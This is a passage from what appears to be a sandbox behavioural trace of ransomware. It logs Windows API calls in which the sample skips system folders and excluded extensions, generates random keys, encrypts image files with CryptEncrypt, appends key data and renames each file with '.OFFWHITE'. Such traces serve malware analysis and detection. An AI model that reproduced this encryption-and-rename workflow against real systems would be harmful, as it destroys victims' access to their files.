lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.438] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x16fd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.439] WriteFile (in: hFile=0x218, lpBuffer=0x531a40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a40*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.439] GetProcessHeap () returned 0x500000 [0135.439] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16dd3) returned 0x55c7c8 [0135.439] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.439] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x16dd3, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x16dd3, lpOverlapped=0x0) returned 1 [0135.444] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.444] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x16dd3, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x16dd3, lpOverlapped=0x0) returned 1 [0135.444] GetProcessHeap () returned 0x500000 [0135.444] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.444] CloseHandle (hObject=0x218) returned 1 [0135.447] GetProcessHeap () returned 0x500000 [0135.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.447] GetProcessHeap () returned 0x500000 [0135.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.447] GetProcessHeap () returned 0x500000 [0135.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.447] GetProcessHeap () returned 0x500000 [0135.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.447] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp" [0135.448] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp.OFFWHITE" [0135.448] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\wbuha1lzn6cl.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\wBUhA1LzN6CL.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\wbuha1lzn6cl.bmp.offwhite")) returned 1 [0135.449] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf6ca60, ftCreationTime.dwHighDateTime=0x1d5e698, ftLastAccessTime.dwLowDateTime=0x241b580, ftLastAccessTime.dwHighDateTime=0x1d5e65f, ftLastWriteTime.dwLowDateTime=0x241b580, ftLastWriteTime.dwHighDateTime=0x1d5e65f, nFileSizeHigh=0x0, nFileSizeLow=0x15334, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="z2yAK2EZnPKhKlRvpK.gif", cAlternateFileName="Z2YAK2~1.GIF")) returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2=".") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="..") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="...") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="windows") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="$recycle.bin") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="rsa") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="ntuser.dat") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="programdata") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="appdata") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="program files") returned 1 [0135.449] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="program files (x86)") returned 1 [0135.449] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.449] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="z2yAK2EZnPKhKlRvpK.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif" [0135.449] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.449] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.449] PathFindExtensionW (pszPath="z2yAK2EZnPKhKlRvpK.gif") returned=".gif" [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.449] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.450] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.450] lstrcmpiW (lpString1="z2yAK2EZnPKhKlRvpK.gif", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.450] GetProcessHeap () returned 0x500000 [0135.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a50 [0135.450] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\z2yak2eznpkhklrvpk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.450] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=86836) returned 1 [0135.450] GetProcessHeap () returned 0x500000 [0135.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.450] GetProcessHeap () returned 0x500000 [0135.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.450] GetProcessHeap () returned 0x500000 [0135.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.450] GetProcessHeap () returned 0x500000 [0135.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.450] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.450] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.450] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.450] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.450] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.450] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.450] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.450] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.450] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.451] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.451] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.451] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.451] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15334, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.451] SetLastError (dwErrCode=0x0) [0135.451] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.453] GetLastError () returned 0x0 [0135.453] GetLastError () returned 0x0 [0135.453] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15434, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.453] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.453] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15534, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.453] WriteFile (in: hFile=0x218, lpBuffer=0x531a50*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a50*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.453] GetProcessHeap () returned 0x500000 [0135.453] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15334) returned 0x55c7c8 [0135.453] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.453] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x15334, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x15334, lpOverlapped=0x0) returned 1 [0135.458] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.458] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x15334, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x15334, lpOverlapped=0x0) returned 1 [0135.458] GetProcessHeap () returned 0x500000 [0135.458] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.458] CloseHandle (hObject=0x218) returned 1 [0135.461] GetProcessHeap () returned 0x500000 [0135.461] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.461] GetProcessHeap () returned 0x500000 [0135.461] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.461] GetProcessHeap () returned 0x500000 [0135.461] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.461] GetProcessHeap () returned 0x500000 [0135.461] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.461] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif" [0135.461] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif.OFFWHITE" [0135.461] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\z2yak2eznpkhklrvpk.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\z2yAK2EZnPKhKlRvpK.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\z2yak2eznpkhklrvpk.gif.offwhite")) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf6ca60, ftCreationTime.dwHighDateTime=0x1d5e698, ftLastAccessTime.dwLowDateTime=0x241b580, ftLastAccessTime.dwHighDateTime=0x1d5e65f, ftLastWriteTime.dwLowDateTime=0x241b580, ftLastWriteTime.dwHighDateTime=0x1d5e65f, nFileSizeHigh=0x0, nFileSizeLow=0x15334, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="z2yAK2EZnPKhKlRvpK.gif", cAlternateFileName="Z2YAK2~1.GIF")) returned 0 [0135.462] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0135.462] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6867cea0, ftCreationTime.dwHighDateTime=0x1d5e522, ftLastAccessTime.dwLowDateTime=0xff6ccaa0, ftLastAccessTime.dwHighDateTime=0x1d5db89, ftLastWriteTime.dwLowDateTime=0xff6ccaa0, ftLastWriteTime.dwHighDateTime=0x1d5db89, nFileSizeHigh=0x0, nFileSizeLow=0xf050, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="pGSGRrzfIwBBfb.gif", cAlternateFileName="PGSGRR~1.GIF")) returned 1 [0135.462] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2=".") returned 1 [0135.462] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="..") returned 1 [0135.462] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="...") returned 1 [0135.462] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="windows") returned -1 [0135.462] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="$recycle.bin") returned 1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="rsa") returned -1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="ntuser.dat") returned 1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="programdata") returned -1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="appdata") returned 1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="program files") returned -1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="program files (x86)") returned -1 [0135.463] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.463] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="pGSGRrzfIwBBfb.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif" [0135.463] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.463] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.463] PathFindExtensionW (pszPath="pGSGRrzfIwBBfb.gif") returned=".gif" [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.463] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.463] lstrcmpiW (lpString1="pGSGRrzfIwBBfb.gif", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.463] GetProcessHeap () returned 0x500000 [0135.463] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a60 [0135.463] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\pgsgrrzfiwbbfb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.464] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=61520) returned 1 [0135.464] GetProcessHeap () returned 0x500000 [0135.464] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.464] GetProcessHeap () returned 0x500000 [0135.464] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.464] GetProcessHeap () returned 0x500000 [0135.464] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.464] GetProcessHeap () returned 0x500000 [0135.464] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.464] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.464] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.464] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.464] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.464] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.464] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.464] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.464] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.464] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.464] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.464] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.464] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.465] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.465] SetLastError (dwErrCode=0x0) [0135.465] WriteFile (in: hFile=0x214, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.466] GetLastError () returned 0x0 [0135.466] GetLastError () returned 0x0 [0135.466] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.466] WriteFile (in: hFile=0x214, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.466] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.466] WriteFile (in: hFile=0x214, lpBuffer=0x531a60*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x531a60*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.467] GetProcessHeap () returned 0x500000 [0135.467] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf050) returned 0x55b7c0 [0135.467] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.467] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xf050, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xf050, lpOverlapped=0x0) returned 1 [0135.470] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.470] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xf050, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xf050, lpOverlapped=0x0) returned 1 [0135.470] GetProcessHeap () returned 0x500000 [0135.470] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.470] CloseHandle (hObject=0x214) returned 1 [0135.482] GetProcessHeap () returned 0x500000 [0135.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.482] GetProcessHeap () 